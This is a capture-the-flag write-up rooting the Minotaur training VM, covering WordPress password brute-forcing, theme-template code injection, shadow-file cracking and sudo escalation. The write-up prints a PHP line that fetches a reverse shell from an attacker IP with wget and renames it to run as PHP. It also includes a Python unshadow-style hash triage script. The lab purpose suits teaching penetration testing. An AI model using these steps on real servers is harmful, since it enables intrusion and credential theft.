Mess with the Bull, Get the Horn

Time to catch up with the Sectalks CTFs. First up, Minotaur (Sectalks BNE0x00).

"== Minotaur CTF ==

Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don't have physical access to this machine. Therefore, tricks like editing the VM's BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal."

Let’s get hacking! First up, where is Minotaur hiding? Usually I would run arp or netdiscover to find the victim, but it isn’t broadcasting anything that I can see. Let’s try a ping sweep instead:

Gotcha! What ports are open?

Let’s start with the low-hanging fruit… port 80.

[Screenshot: default Apache page (defaultwww)]

Default Apache page. Time to break out the fuzzer and brute-force some directories…

Looks like we have a webapp at /bull. Let’s take a look:

[Screenshot: the /bull website]

Ummm… “Bulls are majestic animals. Such muscular beasts make me quiver.” Ummm… yeh…. whatever floats your boat ;)

What gets me excited about the page is this: “Proudly powered by WordPress”. Time to scan for known WP vulnerabilities. I have removed the vuln descriptions to keep the output short.

Plenty of vulnerabilities to check out, but first let’s see if we can take the easy route by brute-forcing bully’s password:

I cancelled this brute-force attempt as the dictionary attack was going to take far too long. Looking at the CTF notes, we have these hints:

== Hints ==

This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

Let’s try generating our own dictionary file based on the website’s content:

Take two.. this time with a much smaller wordlist.

Still no joy… this is bullshit. ;) Let’s use john’s wordlist rules to mangle our dictionary file (case changes, suffixes and the like), so the site-derived words become realistic password candidates:

Third try at brute forcing:

Much better! We now have a login to the WordPress site. Let’s see if we have edit privileges on the theme’s main index template:

[Screenshot: editing the theme’s index template (edittheme)]

We most certainly do. Time to add some PHP to the template that downloads our reverse shell onto the server. The file is fetched as .txt and renamed to .php so that the web server will execute it:

<?php
// Fetch the shell from our attacking box, then rename it so Apache runs it as PHP.
shell_exec("wget 192.168.56.130/phpshell.txt ; mv phpshell.txt phpshell.php");
?>

After updating the index template, we set up a simple netcat listener on port 1337, visit the index page so the template fetches our shell onto the server, and then trigger the shell by visiting http://192.168.56.223/bull/phpshell.php:

w00t! First shell!

Taking a look at www-data’s default directory, we can see our first flag.txt!

Next step: let’s go to /tmp and download a simple script for automated enumeration. We can let it run in the background while we hunt for anything unusual or custom.

Hang on a second! What do we have here?

A second flag and a backup of the /etc/shadow file. It doesn’t get much better than this. Let’s use unshadow to combine it with /etc/passwd into a hash file, and pass that to john to see if we can get any creds:
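What unshadow actually does, and which of the resulting entries are worth cracking, as an added Python example (not a tool from the write-up): it performs the same join unshadow does between /etc/passwd and /etc/shadow, then classifies each password field so that “*” placeholders and other uncrackable entries are dropped before the file goes to john. The passwd and shadow fragments are constructed, with placeholder hashes; they are not the CTF’s real backup.

```python
import re

# Constructed /etc/passwd and /etc/shadow fragments. The hash strings carry valid
# crypt(3) prefixes but made-up salts and digests; they are not the CTF's real hashes.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
heffer:x:1000:1000:heffer,,,:/home/heffer:/bin/bash
minotaur:x:1001:1001:minotaur,,,:/home/minotaur:/bin/bash
backupuser:x:1002:1002::/home/backupuser:/bin/bash
"""

SHADOW = """\
root:$6$r00tsalt$placeholderdigest:16500:0:99999:7:::
daemon:*:16500:0:99999:7:::
www-data:*:16500:0:99999:7:::
heffer:$6$heffsalt$placeholderdigest:16500:0:99999:7:::
minotaur:$6$minosalt$placeholderdigest:16500:0:99999:7:::
backupuser:!$6$bkupsalt$placeholderdigest:16500:0:99999:7:::
"""

# crypt(3) hash identifiers john recognises; anything else is reported as unknown.
HASH_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
            "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt", "y": "yescrypt"}


def parse_colon_file(text):
    """Split a passwd/shadow-style file into field lists, skipping blank lines."""
    return [line.split(":") for line in text.splitlines() if line.strip()]


def unshadow(passwd_text, shadow_text):
    """Do what john's unshadow does: copy each user's shadow hash into passwd field 2."""
    shadow = {f[0]: f[1] for f in parse_colon_file(shadow_text)}
    merged = []
    for fields in parse_colon_file(passwd_text):
        if fields[0] in shadow:
            fields[1] = shadow[fields[0]]
        merged.append(":".join(fields))
    return merged


def hash_type(field):
    """Classify a shadow password field; None means there is nothing to crack."""
    # A leading '!' (passwd -l) locks password login but leaves the hash intact,
    # so it is still crackable and still a password-reuse risk.
    locked = field.startswith("!")
    h = field.lstrip("!")
    if h in ("", "*", "*LK*", "*NP*"):
        return None
    m = re.match(r"^\$([^$]+)\$", h)
    if m:
        kind = HASH_IDS.get(m.group(1), "unknown($" + m.group(1) + "$)")
    elif len(h) == 13:
        kind = "descrypt"
    else:
        kind = "unknown"
    return kind + (" (account locked)" if locked else "")


def crackable(merged):
    """Return (user, hash type, hash) for the entries worth feeding to john."""
    out = []
    for line in merged:
        fields = line.split(":")
        kind = hash_type(fields[1])
        if kind:
            out.append((fields[0], kind, fields[1].lstrip("!")))
    return out


if __name__ == "__main__":
    for user, kind, h in crackable(unshadow(PASSWD, SHADOW)):
        print(f"{user}:{h}  # {kind}")
```

Trimming the file down to the crackable entries matters on a slow box: john spends no time on “*” system accounts, and you can see up front whether you are facing sha512crypt (slow, as on this VM’s Ubuntu-style shadow) or something cheaper.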

After about a minute, we get heffer’s password. Let’s log on and see what we have:

Another flag! This time heffer’s:

The first thing I always do is check whether a user has sudo access, but in this case heffer has nothing exciting. I spend a couple of minutes pottering around the file system, only to be interrupted by john finding a second password, this time minotaur’s. Let’s see what minotaur has to offer:

Minotaur’s flag!

Let’s check if minotaur has any sudo privileges:

ALL : ALL… hello! Today is our lucky day. A sudoers entry of (ALL : ALL) ALL means minotaur can run any command as any user and group, which is root in all but name.

We have rooted the minotaur! Let’s raise the flag…

Thanks Bull for a fun challenge and for helping to get the Brisbane SecTalks off the ground.

Until next time, tight lines and happy hacking.